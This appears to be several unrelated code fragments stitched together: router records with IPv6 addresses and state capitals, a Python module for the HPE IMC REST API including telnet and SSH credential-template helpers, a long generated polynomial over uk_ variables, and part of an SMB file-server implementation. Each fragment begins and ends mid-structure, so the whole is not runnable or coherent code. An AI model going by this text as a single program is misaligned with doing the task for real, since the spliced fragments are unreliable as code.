'site': 'Richmond',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '47.039231',
'longitude': '-122.891366',
'name': 'WA',
'site': 'Olympia',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '38.350195',
'longitude': '-81.638989',
'name': 'WV',
'site': 'Charleston',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '43.072950',
'longitude': '-89.386694',
'name': 'WI',
'site': 'Madison',
'type': | |
<gh_stars>10-100
#!/usr/bin/env python3
# coding=utf-8
# author: @netmanchris
# -*- coding: utf-8 -*-
"""
This module contains functions for working with the system configuration
capabilities of the HPE IMC NMS platform using the RESTful API
"""
# This section imports required libraries
import json
import requests
from pyhpeimc.auth import HEADERS
# This section contains functions which operate at the system level
def get_system_vendors(auth, url):
"""Takes string no input to issue RESTUL call to HP IMC\n
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: list of dictionaries where each dictionary represents a single vendor
:rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.system import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> vendors = get_system_vendors(auth.creds, auth.url)
>>> assert type(vendors) is list
>>> assert 'name' in vendors[0]
"""
f_url = url + '/imcrs/plat/res/vendor?start=0&size=10000&orderBy=id&desc=false&total=false'
response = requests.get(f_url, auth=auth, headers=HEADERS)
try:
if response.status_code == 200:
system_vendors = (json.loads(response.text))
return system_vendors['deviceVendor']
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " get_dev_details: An Error has occured"
def get_system_category(auth, url):
"""Takes string no input to issue RESTUL call to HP IMC\n
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: list of dictionaries where each dictionary represents a single device category
:rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.device import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> categories = get_system_category(auth.creds, auth.url)
>>> assert type(categories) is list
>>> assert 'name' in categories[0]
"""
f_url = url + '/imcrs/plat/res/category?start=0&size=10000&orderBy=id&desc=false&total=false'
response = requests.get(f_url, auth=auth, headers=HEADERS)
try:
if response.status_code == 200:
system_category = (json.loads(response.text))
return system_category['deviceCategory']
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " get_dev_details: An Error has occured"
def get_system_device_models(auth, url):
"""Takes string no input to issue RESTUL call to HP IMC
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: list of dictionaries where each dictionary represents a single device model
:rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.device import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> device_models = get_system_device_models(auth.creds, auth.url)
>>> assert type(device_models) is list
>>> assert 'virtualDeviceName' in device_models[0]
"""
f_url = url + '/imcrs/plat/res/model?start=0&size=10000&orderBy=id&desc=false&total=false'
response = requests.get(f_url, auth=auth, headers=HEADERS)
try:
if response.status_code == 200:
system_device_model = (json.loads(response.text))
return system_device_model['deviceModel']
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " get_dev_details: An Error has occured"
def get_system_series(auth, url):
"""Takes no input to issue RESTUL call to HP IMC
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: list of dictionaries where each dictionary represents a single device series
:rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.device import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> series = get_system_series(auth.creds, auth.url)
>>> assert type(series) is list
>>> assert 'name' in series[0]
"""
f_url = url + '/imcrs/plat/res/series?managedOnly=false&start=0&size=10000&orderBy=id&desc' \
'=false&total=false'
response = requests.get(f_url, auth=auth, headers=HEADERS)
try:
if response.status_code == 200:
system_series = (json.loads(response.text))
return system_series['deviceSeries']
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " get_dev_series: An Error has occured"
# This section deals with manipulating system authentication credentials
# Telnet Templates
def create_telnet_template(auth, url, telnet_template ):
"""
Function takes input of a dictionry containing the required key/value pair for the creation
of a telnet template.
:param auth:
:param url:
:param telnet_template: dictionary of valid JSON which complains to API schema
:return: int value of HTTP response code 201 for proper creation or 404 for failed creation
:rtype int
Sample of proper KV pairs. Please see documentation for valid values for different fields.
telnet_template = {"type": "0",
"name": "User_with_Enable",
"authType": "4",
"userName": "admin",
"userPassword": "password",
"superPassword": "password",
"authTypeStr": "Username + Password + Super/Manager Password",
"timeout": "4",
"retries": "1",
"port": "23",
"version": "1",
"creator": "admin",
"accessType": "1",
"operatorGroupStr": ""}
"""
f_url = url + "/imcrs/plat/res/telnet/add"
response = requests.post(f_url, data = json.dumps(telnet_template), auth=auth, headers=HEADERS)
try:
return response.status_code
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " create_telnet_template: An Error has occured"
def get_telnet_template(auth, url, template_name=None):
"""
Takes no input, or template_name as input to issue RESTUL call to HP IMC
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:param template_name: str value of template name
:return list object containing one or more dictionaries where each dictionary represents one
telnet template
:rtype list
"""
f_url = url + "/imcrs/plat/res/telnet?start=0&size=10000&desc=false&total=false"
response = requests.get(f_url, auth=auth, headers=HEADERS)
try:
if response.status_code == 200:
telnet_templates = (json.loads(response.text))
template = None
if type(telnet_templates['telnetParamTemplate']) is dict:
my_templates = [telnet_templates['telnetParamTemplate']]
telnet_templates['telnetParamTemplate'] = my_templates
if template_name is None:
return telnet_templates['telnetParamTemplate']
elif template_name is not None:
for telnet_template in telnet_templates['telnetParamTemplate']:
if telnet_template['name'] == template_name:
template = [telnet_template]
print (type(template))
if template == None:
return 404
else:
return template
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " get_telnet_templates: An Error has occured"
def modify_telnet_template(auth, url, telnet_template, template_name= None, template_id = None):
"""
Function takes input of a dictionry containing the required key/value pair for the modification
of a telnet template.
:param auth:
:param url:
:param telnet_template: Human readable label which is the name of the specific telnet template
:param template_id Internal IMC number which designates the specific telnet template
:return: int value of HTTP response code 201 for proper creation or 404 for failed creation
:rtype int
Sample of proper KV pairs. Please see documentation for valid values for different fields.
telnet_template = {"type": "0",
"name": "User_with_Enable",
"authType": "4",
"userName": "newadmin",
"userPassword": "<PASSWORD>",
"superPassword": "<PASSWORD>",
"authTypeStr": "Username + Password + Super/Manager Password",
"timeout": "4",
"retries": "1",
"port": "23",
"version": "1",
"creator": "admin",
"accessType": "1",
"operatorGroupStr": ""}
"""
if template_name is None:
template_name = telnet_template['name']
if template_id is None:
telnet_templates = get_telnet_template(auth, url)
template_id = None
for template in telnet_templates:
if template['name'] == template_name:
template_id = template['id']
f_url = url + "/imcrs/plat/res/telnet/"+str(template_id)+"/update"
response = requests.put(f_url, data = json.dumps(telnet_template), auth=auth, headers=HEADERS)
try:
return response.status_code
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " modify_telnet_template: An Error has occured"
def delete_telnet_template(auth, url, template_name= None, template_id= None):
"""
Takes template_name as input to issue RESTUL call to HP IMC which will delete the specific
telnet template from the IMC system
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:param template_name: str value of template name
:param template_id: str value template template_id value
:return: int HTTP response code
:rtype int
"""
try:
if template_id is None:
telnet_templates = get_telnet_template(auth, url)
if template_name is None:
template_name = telnet_template['name']
template_id = None
for template in telnet_templates:
if template['name'] == template_name:
template_id = template['id']
f_url = url + "/imcrs/plat/res/telnet/%s/delete" % template_id
response = requests.delete(f_url, auth=auth, headers=HEADERS)
return response.status_code
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " delete_telnet_template: An Error has occured"
# SSH Templates
def create_ssh_template(auth, url, ssh_template ):
"""
Function takes input of a dictionry containing the required key/value pair for the creation
of a ssh template.
:param auth:
:param url:
:param ssh: dictionary of valid JSON which complains to API schema
:return: int value of HTTP response code 201 for proper creation or 404 for failed creation
:rtype int
Sample of proper KV pairs. Please see documentation for valid values for different fields.
ssh_template = {
"type": "0",
"name": "ssh_admin_template",
"authType": "3",
"authTypeStr": "Password + Super Password",
"userName": "admin",
"password": "password",
"superPassword": "password",
"port": "22",
"timeout": "10",
"retries": "3",
"keyFileName": "",
"keyPhrase": ""
}
"""
f_url = url + "/imcrs/plat/res/ssh/add"
response = requests.post(f_url, data = json.dumps(ssh_template), auth=auth, headers=HEADERS)
try:
return response.status_code
except requests.exceptions.RequestException as error:
return "Error:\n" + str(error) + " create_ssh_template: An Error has occured"
def get_ssh_template(auth, url, template_name=None):
"""
Takes no input, or template_name as input to issue RESTUL call to HP IMC
| |
* uk_12
+ 94864 * uk_120
+ 416724 * uk_121
+ 735196 * uk_122
+ 142296 * uk_123
+ 1830609 * uk_124
+ 3229611 * uk_125
+ 625086 * uk_126
+ 5697769 * uk_127
+ 1102794 * uk_128
+ 213444 * uk_129
+ 1325884 * uk_13
+ 74088 * uk_130
+ 49392 * uk_131
+ 216972 * uk_132
+ 382788 * uk_133
+ 74088 * uk_134
+ 32928 * uk_135
+ 144648 * uk_136
+ 255192 * uk_137
+ 49392 * uk_138
+ 635418 * uk_139
+ 5824419 * uk_14
+ 1121022 * uk_140
+ 216972 * uk_141
+ 1977738 * uk_142
+ 382788 * uk_143
+ 74088 * uk_144
+ 21952 * uk_145
+ 96432 * uk_146
+ 170128 * uk_147
+ 32928 * uk_148
+ 423612 * uk_149
+ 10275601 * uk_15
+ 747348 * uk_150
+ 144648 * uk_151
+ 1318492 * uk_152
+ 255192 * uk_153
+ 49392 * uk_154
+ 1860867 * uk_155
+ 3282993 * uk_156
+ 635418 * uk_157
+ 5791947 * uk_158
+ 1121022 * uk_159
+ 1988826 * uk_16
+ 216972 * uk_160
+ 10218313 * uk_161
+ 1977738 * uk_162
+ 382788 * uk_163
+ 74088 * uk_164
+ 3969 * uk_17
+ 7623 * uk_18
+ 2646 * uk_19
+ 63 * uk_2
+ 1764 * uk_20
+ 7749 * uk_21
+ 13671 * uk_22
+ 2646 * uk_23
+ 14641 * uk_24
+ 5082 * uk_25
+ 3388 * uk_26
+ 14883 * uk_27
+ 26257 * uk_28
+ 5082 * uk_29
+ 121 * uk_3
+ 1764 * uk_30
+ 1176 * uk_31
+ 5166 * uk_32
+ 9114 * uk_33
+ 1764 * uk_34
+ 784 * uk_35
+ 3444 * uk_36
+ 6076 * uk_37
+ 1176 * uk_38
+ 15129 * uk_39
+ 42 * uk_4
+ 26691 * uk_40
+ 5166 * uk_41
+ 47089 * uk_42
+ 9114 * uk_43
+ 1764 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 271319099689 * uk_47
+ 94176877578 * uk_48
+ 62784585052 * uk_49
+ 28 * uk_5
+ 275803712907 * uk_50
+ 486580534153 * uk_51
+ 94176877578 * uk_52
+ 187944057 * uk_53
+ 360971919 * uk_54
+ 125296038 * uk_55
+ 83530692 * uk_56
+ 366938397 * uk_57
+ 647362863 * uk_58
+ 125296038 * uk_59
+ 123 * uk_6
+ 693295273 * uk_60
+ 240647946 * uk_61
+ 160431964 * uk_62
+ 704754699 * uk_63
+ 1243347721 * uk_64
+ 240647946 * uk_65
+ 83530692 * uk_66
+ 55687128 * uk_67
+ 244625598 * uk_68
+ 431575242 * uk_69
+ 217 * uk_7
+ 83530692 * uk_70
+ 37124752 * uk_71
+ 163083732 * uk_72
+ 287716828 * uk_73
+ 55687128 * uk_74
+ 716403537 * uk_75
+ 1263898923 * uk_76
+ 244625598 * uk_77
+ 2229805417 * uk_78
+ 431575242 * uk_79
+ 42 * uk_8
+ 83530692 * uk_80
+ 250047 * uk_81
+ 480249 * uk_82
+ 166698 * uk_83
+ 111132 * uk_84
+ 488187 * uk_85
+ 861273 * uk_86
+ 166698 * uk_87
+ 922383 * uk_88
+ 320166 * uk_89
+ 2242306609 * uk_9
+ 213444 * uk_90
+ 937629 * uk_91
+ 1654191 * uk_92
+ 320166 * uk_93
+ 111132 * uk_94
+ 74088 * uk_95
+ 325458 * uk_96
+ 574182 * uk_97
+ 111132 * uk_98
+ 49392 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 189000 * uk_100
+ 328104 * uk_101
+ 182952 * uk_102
+ 984375 * uk_103
+ 1708875 * uk_104
+ 952875 * uk_105
+ 2966607 * uk_106
+ 1654191 * uk_107
+ 922383 * uk_108
+ 1092727 * uk_109
+ 4877359 * uk_11
+ 1283689 * uk_110
+ 254616 * uk_111
+ 1326125 * uk_112
+ 2302153 * uk_113
+ 1283689 * uk_114
+ 1508023 * uk_115
+ 299112 * uk_116
+ 1557875 * uk_117
+ 2704471 * uk_118
+ 1508023 * uk_119
+ 5729713 * uk_12
+ 59328 * uk_120
+ 309000 * uk_121
+ 536424 * uk_122
+ 299112 * uk_123
+ 1609375 * uk_124
+ 2793875 * uk_125
+ 1557875 * uk_126
+ 4850167 * uk_127
+ 2704471 * uk_128
+ 1508023 * uk_129
+ 1136472 * uk_13
+ 1771561 * uk_130
+ 351384 * uk_131
+ 1830125 * uk_132
+ 3177097 * uk_133
+ 1771561 * uk_134
+ 69696 * uk_135
+ 363000 * uk_136
+ 630168 * uk_137
+ 351384 * uk_138
+ 1890625 * uk_139
+ 5919125 * uk_14
+ 3282125 * uk_140
+ 1830125 * uk_141
+ 5697769 * uk_142
+ 3177097 * uk_143
+ 1771561 * uk_144
+ 13824 * uk_145
+ 72000 * uk_146
+ 124992 * uk_147
+ 69696 * uk_148
+ 375000 * uk_149
+ 10275601 * uk_15
+ 651000 * uk_150
+ 363000 * uk_151
+ 1130136 * uk_152
+ 630168 * uk_153
+ 351384 * uk_154
+ 1953125 * uk_155
+ 3390625 * uk_156
+ 1890625 * uk_157
+ 5886125 * uk_158
+ 3282125 * uk_159
+ 5729713 * uk_16
+ 1830125 * uk_160
+ 10218313 * uk_161
+ 5697769 * uk_162
+ 3177097 * uk_163
+ 1771561 * uk_164
+ 3969 * uk_17
+ 6489 * uk_18
+ 7623 * uk_19
+ 63 * uk_2
+ 1512 * uk_20
+ 7875 * uk_21
+ 13671 * uk_22
+ 7623 * uk_23
+ 10609 * uk_24
+ 12463 * uk_25
+ 2472 * uk_26
+ 12875 * uk_27
+ 22351 * uk_28
+ 12463 * uk_29
+ 103 * uk_3
+ 14641 * uk_30
+ 2904 * uk_31
+ 15125 * uk_32
+ 26257 * uk_33
+ 14641 * uk_34
+ 576 * uk_35
+ 3000 * uk_36
+ 5208 * uk_37
+ 2904 * uk_38
+ 15625 * uk_39
+ 121 * uk_4
+ 27125 * uk_40
+ 15125 * uk_41
+ 47089 * uk_42
+ 26257 * uk_43
+ 14641 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 230957580727 * uk_47
+ 271319099689 * uk_48
+ 53815358616 * uk_49
+ 24 * uk_5
+ 280288326125 * uk_50
+ 486580534153 * uk_51
+ 271319099689 * uk_52
+ 187944057 * uk_53
+ 307273617 * uk_54
+ 360971919 * uk_55
+ 71597736 * uk_56
+ 372904875 * uk_57
+ 647362863 * uk_58
+ 360971919 * uk_59
+ 125 * uk_6
+ 502367977 * uk_60
+ 590160439 * uk_61
+ 117056616 * uk_62
+ 609669875 * uk_63
+ 1058386903 * uk_64
+ 590160439 * uk_65
+ 693295273 * uk_66
+ 137513112 * uk_67
+ 716214125 * uk_68
+ 1243347721 * uk_69
+ 217 * uk_7
+ 693295273 * uk_70
+ 27275328 * uk_71
+ 142059000 * uk_72
+ 246614424 * uk_73
+ 137513112 * uk_74
+ 739890625 * uk_75
+ 1284450125 * uk_76
+ 716214125 * uk_77
+ 2229805417 * uk_78
+ 1243347721 * uk_79
+ 121 * uk_8
+ 693295273 * uk_80
+ 250047 * uk_81
+ 408807 * uk_82
+ 480249 * uk_83
+ 95256 * uk_84
+ 496125 * uk_85
+ 861273 * uk_86
+ 480249 * uk_87
+ 668367 * uk_88
+ 785169 * uk_89
+ 2242306609 * uk_9
+ 155736 * uk_90
+ 811125 * uk_91
+ 1408113 * uk_92
+ 785169 * uk_93
+ 922383 * uk_94
+ 182952 * uk_95
+ 952875 * uk_96
+ 1654191 * uk_97
+ 922383 * uk_98
+ 36288 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 192024 * uk_100
+ 328104 * uk_101
+ 155736 * uk_102
+ 1016127 * uk_103
+ 1736217 * uk_104
+ 824103 * uk_105
+ 2966607 * uk_106
+ 1408113 * uk_107
+ 668367 * uk_108
+ 1295029 * uk_109
+ 5161477 * uk_11
+ 1223743 * uk_110
+ 285144 * uk_111
| |
search only)
if pattern == '*':
files.append(os.path.join(dirName,'.'))
files.append(os.path.join(dirName,'..'))
if pattern != '':
for file in os.listdir(dirName):
if fnmatch.fnmatch(file.lower(),pattern.lower()):
entry = os.path.join(dirName, file)
if os.path.isdir(entry):
if searchAttributes & smb.ATTR_DIRECTORY:
files.append(entry)
else:
files.append(entry)
else:
if os.path.exists(pathName):
files.append(pathName)
searchResult = []
searchCount = len(files)
errorCode = STATUS_SUCCESS
for i in files:
if level == smb.SMB_FIND_FILE_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_BOTH_DIRECTORY_INFO:
item = smb.SMBFindFileBothDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_DIRECTORY_INFO or level == smb2.SMB2_FILE_DIRECTORY_INFO:
item = smb.SMBFindFileDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_FULL_DIRECTORY_INFO or level == smb2.SMB2_FULL_DIRECTORY_INFO:
item = smb.SMBFindFileFullDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_INFO_STANDARD:
item = smb.SMBFindInfoStandard( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO or level == smb2.SMB2_FILE_ID_FULL_DIRECTORY_INFO:
item = smb.SMBFindFileIdFullDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_ID_BOTH_DIRECTORY_INFO:
item = smb.SMBFindFileIdBothDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_NAMES_INFO or level == smb2.SMB2_FILE_NAMES_INFO:
item = smb.SMBFindFileNamesInfo( flags = pktFlags )
else:
LOG.error("Wrong level %d!" % level)
return searchResult, searchCount, STATUS_NOT_SUPPORTED
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(i)
if os.path.isdir(i):
item['ExtFileAttributes'] = smb.ATTR_DIRECTORY
else:
item['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
item['FileName'] = os.path.basename(i).encode(encoding)
if level == smb.SMB_FIND_FILE_BOTH_DIRECTORY_INFO or level == smb.SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_ID_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_BOTH_DIRECTORY_INFO:
item['EaSize'] = 0
item['EndOfFile'] = size
item['AllocationSize'] = size
item['CreationTime'] = getFileTime(ctime)
item['LastAccessTime'] = getFileTime(atime)
item['LastWriteTime'] = getFileTime(mtime)
item['LastChangeTime'] = getFileTime(mtime)
item['ShortName'] = '\x00'*24
item['FileName'] = os.path.basename(i).encode(encoding)
padLen = (8-(len(item) % 8)) % 8
item['NextEntryOffset'] = len(item) + padLen
elif level == smb.SMB_FIND_FILE_DIRECTORY_INFO:
item['EndOfFile'] = size
item['AllocationSize'] = size
item['CreationTime'] = getFileTime(ctime)
item['LastAccessTime'] = getFileTime(atime)
item['LastWriteTime'] = getFileTime(mtime)
item['LastChangeTime'] = getFileTime(mtime)
item['FileName'] = os.path.basename(i).encode(encoding)
padLen = (8-(len(item) % 8)) % 8
item['NextEntryOffset'] = len(item) + padLen
elif level == smb.SMB_FIND_FILE_FULL_DIRECTORY_INFO or level == smb.SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO or level == smb2.SMB2_FULL_DIRECTORY_INFO:
item['EaSize'] = 0
item['EndOfFile'] = size
item['AllocationSize'] = size
item['CreationTime'] = getFileTime(ctime)
item['LastAccessTime'] = getFileTime(atime)
item['LastWriteTime'] = getFileTime(mtime)
item['LastChangeTime'] = getFileTime(mtime)
padLen = (8-(len(item) % 8)) % 8
item['NextEntryOffset'] = len(item) + padLen
elif level == smb.SMB_FIND_INFO_STANDARD:
item['EaSize'] = size
item['CreationDate'] = getSMBDate(ctime)
item['CreationTime'] = getSMBTime(ctime)
item['LastAccessDate'] = getSMBDate(atime)
item['LastAccessTime'] = getSMBTime(atime)
item['LastWriteDate'] = getSMBDate(mtime)
item['LastWriteTime'] = getSMBTime(mtime)
searchResult.append(item)
# No more files
if (level >= smb.SMB_FIND_FILE_DIRECTORY_INFO or isSMB2 is True) and searchCount > 0:
searchResult[-1]['NextEntryOffset'] = 0
return searchResult, searchCount, errorCode
def queryFileInformation(path, filename, level):
#print "queryFileInfo path: %s, filename: %s, level:0x%x" % (path,filename,level)
return queryPathInformation(path,filename, level)
def queryPathInformation(path, filename, level):
# TODO: Depending on the level, this could be done much simpler
#print("queryPathInfo path: %s, filename: %s, level:0x%x" % (path,filename,level))
try:
errorCode = 0
fileName = os.path.normpath(filename.replace('\\','/'))
if len(fileName) > 0 and (fileName[0] == '/' or fileName[0] == '\\') and path != '':
# strip leading '/'
fileName = fileName[1:]
pathName = os.path.join(path,fileName)
if os.path.exists(pathName):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(pathName)
if level == smb.SMB_QUERY_FILE_BASIC_INFO:
infoRecord = smb.SMBQueryFileBasicInfo()
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
if os.path.isdir(pathName):
infoRecord['ExtFileAttributes'] = smb.ATTR_DIRECTORY
else:
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
elif level == smb.SMB_QUERY_FILE_STANDARD_INFO:
infoRecord = smb.SMBQueryFileStandardInfo()
infoRecord['AllocationSize'] = size
infoRecord['EndOfFile'] = size
if os.path.isdir(pathName):
infoRecord['Directory'] = 1
else:
infoRecord['Directory'] = 0
elif level == smb.SMB_QUERY_FILE_ALL_INFO or level == smb2.SMB2_FILE_ALL_INFO:
infoRecord = smb.SMBQueryFileAllInfo()
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
if os.path.isdir(pathName):
infoRecord['ExtFileAttributes'] = smb.ATTR_DIRECTORY
else:
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['AllocationSize'] = size
infoRecord['EndOfFile'] = size
if os.path.isdir(pathName):
infoRecord['Directory'] = 1
else:
infoRecord['Directory'] = 0
infoRecord['FileName'] = filename.encode('utf-16le')
elif level == smb2.SMB2_FILE_NETWORK_OPEN_INFO:
infoRecord = smb.SMBFileNetworkOpenInfo()
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['ChangeTime'] = getFileTime(mtime)
infoRecord['AllocationSize'] = size
infoRecord['EndOfFile'] = size
if os.path.isdir(pathName):
infoRecord['FileAttributes'] = smb.ATTR_DIRECTORY
else:
infoRecord['FileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
elif level == smb.SMB_QUERY_FILE_EA_INFO or level == smb2.SMB2_FILE_EA_INFO:
infoRecord = smb.SMBQueryFileEaInfo()
elif level == smb2.SMB2_FILE_STREAM_INFO:
infoRecord = smb.SMBFileStreamInformation()
else:
LOG.error('Unknown level for query path info! 0x%x' % level)
# UNSUPPORTED
return None, STATUS_NOT_SUPPORTED
return infoRecord, errorCode
else:
# NOT FOUND
return None, STATUS_OBJECT_NAME_NOT_FOUND
except Exception as e:
LOG.error('queryPathInfo: %s' % e)
raise
def queryDiskInformation(path):
# TODO: Do something useful here :)
# For now we just return fake values
totalUnits = 65535
freeUnits = 65535
return totalUnits, freeUnits
# Here we implement the NT transaction handlers
class NTTRANSCommands:
def default(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
pass
# Here we implement the NT transaction handlers
class TRANSCommands:
@staticmethod
def lanMan(connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# Minimal [MS-RAP] implementation, just to return the shares
connData = smbServer.getConnectionData(connId)
respSetup = b''
respParameters = b''
respData = b''
errorCode = STATUS_SUCCESS
if struct.unpack('<H',parameters[:2])[0] == 0:
# NetShareEnum Request
netShareEnum = smb.SMBNetShareEnum(parameters)
if netShareEnum['InfoLevel'] == 1:
shares = getShares(connId, smbServer)
respParameters = smb.SMBNetShareEnumResponse()
respParameters['EntriesReturned'] = len(shares)
respParameters['EntriesAvailable'] = len(shares)
tailData = ''
for i in shares:
# NetShareInfo1 len == 20
entry = smb.NetShareInfo1()
entry['NetworkName'] = i + '\x00'*(13-len(i))
entry['Type'] = int(shares[i]['share type'])
# (beto) If offset == 0 it crashes explorer.exe on windows 7
entry['RemarkOffsetLow'] = 20 * len(shares) + len(tailData)
respData += entry.getData()
if 'comment' in shares[i]:
tailData += shares[i]['comment'] + '\x00'
else:
tailData += '\x00'
respData += tailData
else:
# We don't support other info levels
errorCode = STATUS_NOT_SUPPORTED
elif struct.unpack('<H',parameters[:2])[0] == 13:
# NetrServerGetInfo Request
respParameters = smb.SMBNetServerGetInfoResponse()
netServerInfo = smb.SMBNetServerInfo1()
netServerInfo['ServerName'] = smbServer.getServerName()
respData = netServerInfo.getData()
respParameters['TotalBytesAvailable'] = len(respData)
elif struct.unpack('<H',parameters[:2])[0] == 1:
# NetrShareGetInfo Request
request = smb.SMBNetShareGetInfo(parameters)
respParameters = smb.SMBNetShareGetInfoResponse()
shares = getShares(connId, smbServer)
share = shares[request['ShareName'].upper()]
shareInfo = smb.NetShareInfo1()
shareInfo['NetworkName'] = request['ShareName'].upper() + '\x00'
shareInfo['Type'] = int(share['share type'])
respData = shareInfo.getData()
if 'comment' in share:
shareInfo['RemarkOffsetLow'] = len(respData)
respData += share['comment'] + '\x00'
respParameters['TotalBytesAvailable'] = len(respData)
else:
# We don't know how to handle anything else
errorCode = STATUS_NOT_SUPPORTED
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
@staticmethod
def transactNamedPipe(connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
connData = smbServer.getConnectionData(connId)
respSetup = b''
respParameters = b''
respData = b''
errorCode = STATUS_SUCCESS
SMBCommand = smb.SMBCommand(recvPacket['Data'][0])
transParameters= smb.SMBTransaction_Parameters(SMBCommand['Parameters'])
# Extract the FID
fid = struct.unpack('<H', transParameters['Setup'][2:])[0]
if fid in connData['OpenedFiles']:
fileHandle = connData['OpenedFiles'][fid]['FileHandle']
if fileHandle != PIPE_FILE_DESCRIPTOR:
os.write(fileHandle,data)
respData = os.read(fileHandle,data)
else:
sock = connData['OpenedFiles'][fid]['Socket']
sock.send(data)
respData = sock.recv(maxDataCount)
else:
errorCode = STATUS_INVALID_HANDLE
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
# Here we implement the transaction2 handlers
class TRANS2Commands:
# All these commands return setup, parameters, data, errorCode
@staticmethod
def setPathInformation(connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
connData = smbServer.getConnectionData(connId)
respSetup = b''
respParameters = b''
respData = b''
errorCode = STATUS_SUCCESS
setPathInfoParameters = smb.SMBSetPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if recvPacket['Tid'] in connData['ConnectedShares']:
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
fileName = decodeSMBString(recvPacket['Flags2'], setPathInfoParameters['FileName'])
fileName = os.path.normpath(fileName.replace('\\','/'))
if len(fileName) > 0 and (fileName[0] == '/' or fileName[0] == '\\') and path != '':
# strip leading '/'
fileName = fileName[1:]
pathName = os.path.join(path,fileName)
if os.path.exists(pathName):
informationLevel = setPathInfoParameters['InformationLevel']
if informationLevel == smb.SMB_SET_FILE_BASIC_INFO:
infoRecord = smb.SMBSetFileBasicInfo(data)
# Creation time won't be set, the other ones we play with.
atime = infoRecord['LastAccessTime']
if atime == 0:
atime = -1
else:
atime = getUnixTime(atime)
mtime = infoRecord['LastWriteTime']
if mtime == 0:
mtime = -1
else:
mtime = getUnixTime(mtime)
if mtime != -1 or atime != -1:
os.utime(pathName,(atime,mtime))
else:
smbServer.log('Unknown level for set path info! 0x%x' % setPathInfoParameters['InformationLevel'], logging.ERROR)
# UNSUPPORTED
errorCode = STATUS_NOT_SUPPORTED
else:
